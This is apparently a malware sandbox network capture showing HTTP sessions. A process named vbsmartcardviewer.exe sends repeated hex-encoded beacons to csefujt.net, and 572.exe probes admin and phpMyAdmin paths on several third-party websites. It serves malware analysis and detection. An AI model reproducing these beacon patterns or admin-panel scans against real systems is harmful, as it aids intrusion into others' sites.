                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:15.093491077 CET151INData Raw: 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                325192.168.2.658317185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:24.995229959 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:25.237082958 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:25 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                326192.168.2.658318185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:33.484558105 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:33.727189064 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:33 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                327192.168.2.658320185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:39.283133984 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:39.527894020 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:39 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                328192.168.2.658321185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:52.661755085 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:52.903367996 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                329192.168.2.65830787.233.198.2080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:05.875874043 CET198OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: idp.uitgeverij-deviant.nl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                330192.168.2.66189496.7.224.17880
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.624286890 CET169OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: naukrigulf.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.737253904 CET623INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Server: AkamaiGHost
                                                                                                                                                                                                                                                                                                                                                                Mime-Version: 1.0
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 264
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Server-Timing: cdn-cache; desc=HIT
                                                                                                                                                                                                                                                                                                                                                                Server-Timing: edge; dur=1
                                                                                                                                                                                                                                                                                                                                                                Server-Timing: ak_p; desc="1707131766676_1611129006_213793506_17_10936_164_0_-";dur=1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 48 31 3e 0a 20 0a 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 6e 61 75 6b 72 69 67 75 6c 66 26 23 34 36 3b 63 6f 6d 26 23 34 37 3b 61 64 6d 69 6e 22 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 50 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 31 38 26 23 34 36 3b 61 65 65 30 30 37 36 30 26 23 34 36 3b 31 37 30 37 31 33 31 37 36 36 26 23 34 36 3b 63 62 65 33 61 65 32 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <HTML><HEAD><TITLE>Access Denied</TITLE></HEAD><BODY><H1>Access Denied</H1> You don't have permission to access "http&#58;&#47;&#47;naukrigulf&#46;com&#47;admin" on this server.<P>Reference&#32;&#35;18&#46;aee00760&#46;1707131766&#46;cbe3ae2</BODY></HTML>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                331192.168.2.661896162.241.203.3080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.624345064 CET168OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: nossoplayer.me
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.737034082 CET1114INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Thu, 06 Oct 2022 20:52:18 GMT
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 836
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 e6 74 3e 60 4e e7 db e9 fc a9 cc f9 6c c0 9c cf b6 f3 d9 53 99 a7 43 e6 e9 6c 7b fa 64 e6 f8 64 31 80 46 7f 1b 9f 07 b0 5f b5 72 39 3e 1d 2e 2c fa db f8 3c c0 57 75 6d 40 32 35 ba 92 8f 94 70 7c 20 e1 38 4a 38 fe a6 2d a6 07 2a a6 51 c5 f4 db aa 58 1c a8 58 44 15 8b 03 15 07 2c 1d 42 ba 22 e2 c0 5e d5 23 8b 6e 14 df 24 fb 75 f1 a5 81 50 01 f0 ff 22 d6 e4 38 7c 5d a9 6e 02 93 fd fd c5 f1 8b ff a8 cf d2 0a 54 71 63 ae a8 b8 bc 85 16 d8 0a 6d 54 88 6a e3 17 60 85 0e bc 08 b5 d2 70 db 77 98 e4 69 73 1f 38 ac 37 72 1b e2 29 88 ce 0a 56 4e fb 99 31 b7 9a 2c cf bd 27 11 27 8d e3 4c 0e 82 e3 65 16 bf 21 b9 72 f9 b6 0e 47 59 ba 77 b2 95 5f be d9 7d 22 01 ae 1b d0 2b 4b a1 7b 07 21 28 51 ef ae 4a 74 ea 79 c4 8d 87 b8 7a f9 4e 79 d0 20 3e 36 20 ee 12 af bd 96 f4 ee 6f 01 81 77 57 a2 f6 a4 1b af 5c 41 62 4d 28 2c b5 58 28 41 8d 70 8d d3 4a c0 16 03 63 73 24 34 78 c6 35 c6 72 19 6e 98 05 96 18 4f 4c 74 83 15 e0 61 f7 17 45 dd de 03 2b 0b 8e a1 83 04 28 1b 6c 44 63 c5 f5 ee da dd 95 c1 82 46 59 5a 0f 87 55 fb b5 56 cc 75 f8 3e 4d 37 9b cd a8 a2 c0 a5 62 f2 23 4d 76 b4 f2 89 60 64 03 79 f2 3a 06 2e ba 40 b2 3c 23 57 c5 c6 4a 3a 0a f1 1b a8 21 b5 b7 1a 43 25 0d 97 11 e3 68 4b 11 bc ee 5d 13 5a 55 42 48 bb 6c 79 df 3f b4 65 22 94 e1 41 eb 41 a7 34 b6 ea 1f c5 a1 df 9b a4 c2 a2 00 17 ef e4 f6 48 c6 c9 f2 51 f9 b3 83 de 5f 54 81 c6 34 f1 86 14 23 39 19 4f ee 46 c7 67 d8 58 2f 3d 84 9a 5c c0 16 c4 5e 69 bf 38 f9 a2 b4 be 77 6f 67 e9 8a 8a cb 68 c6 ab 64 6b a2 f1 2f 66 df cc 8d 39 09 00 00
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: nFeE.H:$AX-G;6F)b]M*N9Pfz{wbka+fI|)DV*h[`%t|dklW<#[+Dhr.tCQ)y"lj`U^@s$!22he ?DZe\`ARO++p].#XPCJ2+^]1!Et1L*uD.C6vZ]scrr2]BvrTt>`NlSCl{dd1F_r9>.,<Wum@25p| 8J8-*QXXD,B"^#n$uP"8|]nTqcmTj`pwis87r)VN1,''Le!rGYw_}"+K{!(QJtyzNy >6 owW\AbM(,X(ApJcs$4x5rnOLtaE+(lDcFYZUVu>M7b#Mv`dy:.@<#WJ:!C%hK]ZUBHly?e"AA4HQ_T4#9OFgX/=\^i8woghdk/f9


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                332192.168.2.661893104.21.14.24580
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.624600887 CET169OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ag.ufa9999.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.753927946 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=15
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 11:16:21 GMT
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Wd%2B8JsgC3Td84n6iMZ6k%2Fapyj9BO%2F1FzrIZn6FWKLe%2Ff8nUOtk%2BwhkQVt2N40O8TRwDmVdYW0CtMQcdOnqxnH3dalpuc4mB3BDqTgFVh6C7Yh4tHph%2Bcx%2BNWH6j%2FmAfaXg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd45bae21353-ATL
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 36 63 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 7f 6f e3 b8 11 fd df 9f 62 a2 02 89 0d 58 52 bc bb e9 26 8e ac e2 ba 9b 02 01 b6 b8 ed 6d 16 ed e2 b0 08 28 72 64 f1 42 91 3a 92 b2 62 a4 f9 ee 05 45 c9 96 7f 24 d7 45 0b 04 88 28 0e df cc 3c be 19 91 4e 4e 3e fe fc e1 ee db e7 1b 28 6c 29 d2 51 72 12 86 bf f2 1c 84 85 db 1b 78 ff 3d 85 c4 4d 00 15 c4 98 45 20 55 f8 9b 01 8e 7f 06 25 18 c7 00 04 91 cb 45 80 32 fc fa 25 48 21 39 f9 15 25 e3 f9 f7 30 dc 42 75 38 00 c7 a1 de ff 18 d4 e5 2b 50 97 3f 00 b5 b4 1d 9a 7b 71 2c cb 43 94 30 dc 45 2a 90 b0 74 94 58 6e 05 a6 3f 59 8b d2 72 25 e1 17 fc bd e6 1a d9 09 fc 1b 3e 08 55 b3 5c 10 8d 49 ec ed 46 49 89 96 00 2d 88 36 68 17 c1 d7 bb bf 85 97 01 c4 fd 44 61 6d 15 3a 84 d5 22 f8 a0 a4 03 0d ef d6 15 06 40 fd 68 11 58 7c b4 b1 8b f7 7a 03 f3 1a ca bf c2 af 3f 85 1f 54 59 11 cb 33 31 04 ba bd 59 dc b0 25 0e d6 49 52 e2 22 d0 2a 53 d6 0c 0c a5 e2 92 e1 e3 14 a4 ca 95 10 aa 39 58 b2 e2 d8 54 4a db c1 a2 86 33 5b 2c 18 ae 38 c5 b0 1d 4c b9 e4 96 13 11 1a 4a 04 2e 66 1e 45 70 f9 00 1a c5 22 30 76 2d d0 14 88 36 00 ce 16 01 cd ef fd ab 90 1a 13 40 a1 31 5f 04 31 65 32 a4 4b 1e fb a9 98 e6 11 6a ad b4 89 5a a3 78 5f c3 57 df d3 97 5d 9c 6d 5d 70 74 5e ce fe d0 0b c7 de d1 ae 1a 5a c3 34 53 6c fd 54 12 bd e4 72 7e 7e 5d 11 c6 b8 5c ce cf 9f 13 0f 94 8e 46 03 05 a2 8b 6f 76 de 69 70 94 18 aa 79 65 d3 11 00 cf 61 7c 22 c9 8a 2f 89 55 3a a2 4a 3d 70 bc 91 24 13 c8 26 f0 34 72 25 d0 70 c9 54 13 11 c6 6e 56 28 ed 27 6e 2c 4a d4 e3 b3 8f 3f ff bd 53 ce 27 45 18 b2 b3 29 e4 b5 a4 ad 38 c7 fd 6a 80 15 d1 d0 01 0b 58 00 53 b4 2e 51 da 68 89 f6 46 a0 7b fc eb fa 96 8d cf
